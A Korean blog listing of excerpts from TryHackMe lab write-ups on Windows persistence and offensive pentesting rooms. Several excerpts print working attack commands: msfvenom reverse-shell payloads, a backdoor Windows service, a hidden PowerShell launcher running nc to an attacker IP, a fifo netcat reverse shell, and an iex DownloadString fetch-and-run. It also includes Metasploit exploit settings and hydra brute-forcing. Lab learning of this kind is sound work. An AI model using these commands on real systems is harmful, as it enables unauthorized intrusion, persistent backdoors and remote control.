THM - Windows Local Persistence (3)
·
System/침투
TASK 4. 서비스 남용 4.1 Creating backdoor services  1) 리버스쉘 페이로드 만들기 msfvenom -p windows/x64/shell_reverse_tcp LHOST={ATTACKER_IP} LPORT=4448 -f exe-service -o rev-svc.exe* 포맷이 exe-service이다. 2) 가져오기  scp root@{ATTACKER_IP}:/root/rev-svc.exe c:\windows\3) nc 리스닝 4) 서비스 등록하기 sc.exe create THMservice2 binPath= "C:\windows\rev-svc.exe" start= autosc.exe start THMservice2  4.2 Modifying existing services..
THM - Windows Local Persistence (2)
·
System/침투
Persistence : 침투 후 지속적으로 타겟에 접근할 수 있도록 하는 기술* 참고 : MITRE ATT&CK TASK 33.1 Executable Files바탕화면에 calc.exe 바로가기가 있다고 가정 1) PS 스크립트 만들기# C:\Windows\System32\backdoor.ps1Start-Process -NoNewWindow "c:\tools\nc64.exe" "-e cmd.exe {ATTACKER_IP} 4444"C:\Windows\System32\calc.exe 2) 바탕화면에 있는 calc.exe 바로가기의 Target 변경# target# PowerShell 스크립트가 숨겨진 창에서 실행powershell.exe -WindowStyle hidden C:\Windows\System..
THM - Windows Local Persistence (1)
·
System/침투
Persistence : 침투 후 지속적으로 타겟에 접근할 수 있도록 하는 기술* 참고 : MITRE ATT&CK  TASK 2. 타 계정의 권한 조작 지속성을 얻는 가장 쉬운 방법은 "관리자의 크리덴셜을 얻는 것" 이다. 다만, 블루팀 측에서 탐지하기 어렵게 하기 위해, 타 계정을 조작하여 관리자의 권한을 부여하는 방법을 사용할 것이다. ※ 가정 : 타겟 컴퓨터의 패스워드 해시를 덤프, 계정의 비밀번호를 성공적으로 크랙함 (Administrator)※ kali에서 타겟으로 접속할 때 evil-winrm 툴을 사용한다.evil-winrm -i {TARGET IP} -u user1 -p Password1234 2.1 Assign Group Memberships2.1.1 administrators # cmd..
reverse shell - fifo
·
System/침투
rm /tmp/fifo;mkfifo /tmp/fifo;cat /tmp/fifo | /bin/sh -i 2>&1 | nc 10.10.10.10 4443 >/tmp/fifo fifo : 서로 다른 프로세스 간 통신에 사용되는 파이프 * 본래 pipe는 부모-자식 간에만 이용 가능 - fifo 파일이 이미 존재하는 경우 에러가 발생하기에 삭제 - fifo 파일 생성 - cat tmp/fifo : fifo 파일 읽어와서 표준출력 - 읽은 데이터를 /bin/sh 로 전달하여 실행 * -i : 대화형 쉘 - nc 10.10.10.10 4443 > /tmp/fifo : nc연결시도ㅡ, 그 출력을 fifo로 대충 이런 의미인 듯 하다. 참고로 msfvemon 명령으로도 위 명령생성 가능함 msfvenom -p cmd/..
THM Offensive Pentesting - Gamezone
·
System/침투
TASK 6 Using the CMS dashboard version, use Metasploit to find a payload to execute against the machine. Webmin version : 1.580 vulun : CVE-2012-2982 use exploit/unix/webapp/webmin_show_cgi_exec set RHOSTS set RPORT 10000 set SSL false set USERNAME agent47 set PASSWORD videogamer124 set payload cmd/unix/reverse_python set LHOST set LPORT 10000 exploit
THM Offensive Pentesting - HackPack
·
System/침투
HackPack은 따로 포스팅 안하려고 했는데.. 이렇게라도 적지 않으면 기억나지 않을 듯 하여 포스팅한다. (실습 도중 어택박스가 계속 끊겨서 타겟 IP, 어태커IP 변경이 잦다) TASK 2 1. Login 로그인을 위해 hydra 사용 THM 지시 : hydra -l -P /usr/share/wordlists/ http-post-form 그런데 이대로 작성하면 안되고, 뒤에 좀 더 덧붙여주어야 함. wordlist는 kali에 기본적으로 주어지는 rockyou.txt를 사용했고, http-post-form 뒤에 덧붙일 것. * hydra 사용법은 여기를 참고하자 hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.78.71 http-post-form..
THM Offensive Pentesting - Alfred
·
System/침투
TASK 1 Initial Access 1. Jenkins 포트번호 8080 접속, Jenkins 로그인 화면 확인 무차별대입으로 로그인 2. Execute shell Jenkins는 빌드 시 특정 쉘 스크립트가 실행되도록 하는 기능이 있는 듯. 찾아보니까 project > Build > Execute shell THM 지시대로 command에 쉘 스크립트 작성 Invoke-PowerShellTcp.ps1는 여기에서 다운받을 수 있음. powershell iex (New-Object Net.WebClient).DownloadString('http://your-ip:your-port/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress y..
THM Offensive Pentesting - Steel Mountain
·
System/침투
TASK 1 nmap 80번 포트 열린 것 확인, 웹 페이지 접속 이름 확인. TASK 2 Initial Access 80 이외에 8080도 웹 서버 실행하고 있음 해당 웹서버는 Rejetto Http File Server임 2.3 버전에 CVE-2014-6287 취약점이 존재한다. (링크) 간단히 설명하자면, 검색 기능에서 %00를 이용하여 임의 프로그램을 실행할 수 있는 취약점임. metasploit 통해 exploit 해보자. 1. 모듈 2. use exploit/windows/http/rejetto_hfs_exec show options # 필수 옵션 셋팅 set RHOSTS {target ip} set RPORT {tartget port} set SRVHOST 0.0.0.0 set SRVPORT..